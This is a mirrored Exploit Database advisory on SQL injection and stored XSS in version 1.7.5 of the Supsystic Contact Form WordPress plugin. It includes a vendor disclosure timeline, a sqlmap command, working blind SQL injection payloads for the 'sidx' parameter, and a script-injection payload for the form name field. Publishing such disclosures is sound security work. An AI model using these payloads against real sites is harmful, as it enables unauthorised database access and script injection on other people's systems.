WordPress Plugin Supsystic Contact Form 1.7.5 – Multiple Vulnerabilities

• Exploit Database
• 14 阅读

• 作者： Erik David Martin
  日期： 2021-02-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49544/

• # Exploit Title: WordPress Plugin Supsystic Contact Form 1.7.5 - Multiple Vulnerabilities
  # Date: 24/07/2020
  # Exploit Author: Erik David Martin
  # Vendor Homepage: https://supsystic.com/
  # Software Link: https://downloads.wordpress.org/plugin/contact-form-by-supsystic.1.7.5.zip
  # Version: 1.7.5
  # Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2
  
  
  # 25/07 2020: Vendor notified
  # 27/07 2020: Vendor requested detailed information
  # 27/07 2020: Information provided
  # 07/08 2020: Nudged vendor. No reply
  # 22/08 2020: Nudged vendor. No reply
  # 04/10 2020: Nudged vendor. No reply
  # 29/11 2020: WordPress Plugin Security team contacted
  # 10/12 2020: Vulnerability fixed
  
  
  ##################################
  			 SQLi
  ##################################
  
  
  # 1. Description
  
  The GET parameter "sidx" does not sanitize user input when searching for existing contact forms.
  
  
  # 2. Proof of Concept (PoC)
  
  Use ZAP/Burp to capture the web request when searching for existing contact forms and save it to request.txt
  Referer: http://192.168.0.49/wp-admin/admin.php?page=contact-form-supsystic
  
  sqlmap -r request.txt --dbms=mysql -p sidx --level=5
  
  Parameter: sidx (GET)
  	Type: boolean-based blind
  	Payload: mod=forms&action=getListForTbl&pl=cfs&reqType=ajax&search[text_like]=t&_search=false&nd=1595781461778&rows=10&page=1&sidx=(SELECT (CASE WHEN (9602=9602) THEN 0x6964 ELSE (SELECT 9695 UNION SELECT 1181) END))&sord=desc
  
  	Type: time-based blind
  	Payload: mod=forms&action=getListForTbl&pl=cfs&reqType=ajax&search[text_like]=t&_search=false&nd=1595781461778&rows=10&page=1&sidx=id AND (SELECT 4102 FROM (SELECT(SLEEP(5)))vOKL)&sord=desc
  
  
  
  ##################################
  			Stored XSS
  ##################################
  
  
  # 1. Description
  
  The "Edit name" and "Contact information" features are vulnerable to stored XXS.
  Location: http://192.168.0.49/wp-admin/admin.php?page=contact-form-supsystic&tab=forms_edit&id=[FORM ID]
  
  
  # 2. Proof of Concept (PoC)
  
  Enter the following payload into the "Edit" field in the top left corner: "><script>alert(1)</script><!--'
  The payload will execute when viewing the "Show All Forms" section.
  Referer: http://192.168.0.49/wp-admin/admin.php?page=contact-form-supsystic&tab=forms